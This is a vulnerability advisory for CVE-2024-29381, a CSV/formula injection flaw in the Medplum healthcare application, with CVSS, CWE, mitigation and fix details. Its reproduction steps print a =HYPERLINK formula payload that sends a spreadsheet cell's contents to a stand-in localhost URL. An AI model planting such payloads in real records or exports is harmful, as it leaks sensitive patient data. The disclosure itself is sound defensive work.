/
/
/
CSV/Formula Injection in Medplum

CSV/Formula Injection in Medplum

Vulnerability Reports
March 6, 2024
Profile Icon

Jason Franscisco

CVE Number

CVE-2024-29381

Loginsoft ID

Loginsoft-2024-1012

Description  

The application “Medplum” is affected by CSV/formula injection vulnerability, posing a risk of exposing sensitive data. An attacker could inject a malicious payload into input fields. Subsequently, when a high-privileged user exports the data as CSV, the injected payload may be executed.

CWE

CWE-1236: Improper Neutralization of Formula Elements in a CSV File

Affected Versions

< v3.0.8

CVSS

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N 6.8(Medium)

Steps To Reproduce
  1. Create a new patient with gender field having the payload `=HYPERLINK("http://localhost:8181/?data="&F3,"Click Me") `.

  1. Now Export patient data in CSV format.
  1. Open the CSV file, press the Ctrl key, and left click on the cell with the value Click Me.
  1. Doing this exposes the sensitive data of the user located in cell F3.
Impact

Exposure of sensitive data.

Mitigation:

Convert each field into text when exporting as CSV. Additionally, add filters to the input fields.

Fix

https://github.com/medplum/medplum/pull/4079  

Discovered Date

15 February 2024

Reported Date

19 February 2024

Patched Date

03 March 2024

Credit

Saharsh Agrawal

Explore Cybersecurity Platforms

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Suspendisse varius enim in eros.

Discover Lovi

Sign up to our Newsletter